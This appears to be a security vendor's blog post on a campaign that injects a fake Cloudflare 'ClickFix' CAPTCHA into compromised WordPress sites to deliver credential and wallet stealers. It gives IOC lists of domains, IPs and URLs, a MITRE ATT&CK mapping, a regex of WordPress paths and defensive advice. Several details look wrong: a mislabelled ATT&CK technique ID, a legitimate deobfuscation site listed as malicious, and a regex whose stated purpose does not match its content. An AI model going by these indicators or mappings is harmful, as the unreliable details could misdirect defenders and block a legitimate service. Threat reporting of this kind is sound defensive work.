The Fake Cloudflare Lure: A Global WordPress Compromise Leading to Credential Theft
Executive Summary
The digital landscape is rife with sophisticated threats, but few are as insidious as the compromise of legitimate infrastructure. In a recent alarming discovery by Rapid7 Labs, we have identified a widespread campaign compromising legitimate, high-trust WordPress websites globally. This operation, active since December 2025, weaponizes the concept of trust by injecting a malicious "ClickFix" implant that impersonates a Cloudflare human verification challenge (CAPTCHA).
The objective of this campaign is the theft of credentials and digital wallets from Windows systems. By infecting regional news outlets, local businesses, and even a United States Senate candidate's official webpage, the threat actor has demonstrated a high level of operational capability. At SecLookup, our threat intelligence platform has been actively detecting and blocking this threat, preventing users from inadvertently falling into this trap. This post provides a deep dive into the infection chain, TTPs, and the specific indicators of compromise (IOCs) associated with this operation.
Threat Analysis
The threat actor behind this campaign is likely an affiliate of a larger credential-stealing operation, given the scale and the specific targeting of wallets and credentials. Their primary TTP (Tactic, Technique, and Procedure) involves supply chain compromise (Targeted Web Application Attacks) followed by social engineering.
The Lure: Impersonating Security
The most deceptive aspect of this attack is the user interface. The malicious script mimics a standard Cloudflare challenge page. When a visitor lands on a compromised site, they are presented with a popup claiming a security check is required.
[Browser Popup]
"Please wait while we check your browser..."
[Button] "Check my browser"
This "ClickFix" technique relies on the user's fear of being blocked from a site they wish to access. Once the user clicks the button, the browser's address bar often changes, and a script is executed to download a malicious payload.
The Infection Chain
The malware chain is designed to operate entirely in-memory, rendering traditional file-based antivirus (AV) solutions ineffective. The process follows a multi-stage delivery mechanism:
Obfuscated JavaScript: Upon clicking the fake CAPTCHA, an obfuscated JavaScript file is loaded from a remote server.
PowerShell Stagers: The JavaScript executes PowerShell commands to download and run the next stage of the payload.
In-Memory Shellcode: The final payload is delivered as raw shellcode, which is injected into the memory of inconspicuous Windows processes (such as
explorer.exeorsvchost.exe). This avoids triggering behavioral detection based on file creation.
MITRE ATT&CK Mapping
This campaign maps to several key techniques in the MITRE ATT&CK framework:
T1059.004: Command and Scripting Interpreter: PowerShell: Used extensively for staging and execution.
T1002: Data from Non-Secure Storage: The malware targets digital wallets, which are often stored in insecure browser profiles.
T1027: Obfuscated Files or Information: The JavaScript payload is heavily obfuscated to evade static analysis.
T1055: Process Injection: Shellcode injection into legitimate processes.
T1566.001: Phishing: Spearphishing Link: The initial delivery vector is a trusted link to a compromised website.
The legitimacy of the hosting domain makes detection difficult; security teams must focus on behavioral monitoring (e.g., unexpected PowerShell execution from browser contexts) rather than just domain reputation.
Indicators of Compromise (IOCs)
SecLookup has aggregated the following IOCs based on the Rapid7 research and our own telemetry. All domains listed below have been confirmed malicious and are currently blocked by SecLookup.
Malicious Domains
The following domains were hosting the malicious JavaScript implants and the fake CAPTCHA lures.
wepro.ch
goveanrs.org
namzcp.org
surveygifts.org
beta-charts.org
govearali.org
getalib.org
IP Addresses
The infrastructure associated with this campaign utilizes the following IP addresses to serve the malicious payloads and redirect traffic.
91.92.240.219
172.94.9.187
94.154.35.115
178.16.53.70
94.154.35.152
Malicious URLs
Users were redirected to the following URLs to download the payloads. Note the use of jsrepo parameters often seen in script injection attacks.
https://ligovera.shop/jsrepo?rnd=
https://govearali.org/jsrepo?rnd=
https://obf-io.deobfuscate.io/
https://goveanrs.org/jsrepo?rnd=
https://getalib.org/jsre
https://alianzeg.shop/jsrepo?rnd=
https://ztdaliweb.shop/jsre
Detection Pattern
Security teams can use the following regex pattern to identify attempts to access legitimate WordPress administrative paths, which may be abused by this actor to ensure the infected site remains accessible or to exfiltrate data:
wp-login.php|wp-cron.php|xmlrpc.php|wp-admin|wp-includes|wp-content|\?feed=|\/feed|wp-json|\?wc-ajax|.css|.js|.ico|.png|.gif|.bmp|.jpe?g|.tiff|.mp[34g]|.wmv|.zip|.rar|.exe|.pdf|.txt|sitemap.*.xml|robots.txt
SecLookup Detection
SecLookup maintains a proactive threat intelligence platform designed to identify and neutralize threats before they impact our users. In response to the findings detailed by Rapid7 Labs, SecLookup has immediately updated its threat feed to block the domains and IP addresses identified above.
Recommendations
To defend against this sophisticated credential-stealing campaign, organizations should implement the following measures:
Browser and System Hygiene: Ensure that browsers and operating systems are fully patched. Malware targeting digital wallets often exploits vulnerabilities in browser extensions or the browser itself.
Verify CAPTCHAs: Be skeptical of any CAPTCHA popups. If a site forces you to click a "Check my browser" button to proceed, close the tab immediately. Legitimate CAPTCHAs (like Cloudflare's) typically appear directly on the page without the address bar changing or requiring a new click to load content.
Endpoint Detection and Response (EDR): Since the malware executes in-memory, relying on traditional antivirus is insufficient. Ensure your EDR solution is configured to monitor for PowerShell execution and process injection events originating from browser processes.
Web Application Firewall (WAF): Implement strict WAF rules to block known malicious patterns and obfuscated JavaScript injection attempts on WordPress sites.
User Awareness: Train users to recognize that a "security check" popup is not a standard part of web browsing and should be ignored.
References
- When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation by Milan Spinka, Rapid7 Blog (Published March 10, 2026)
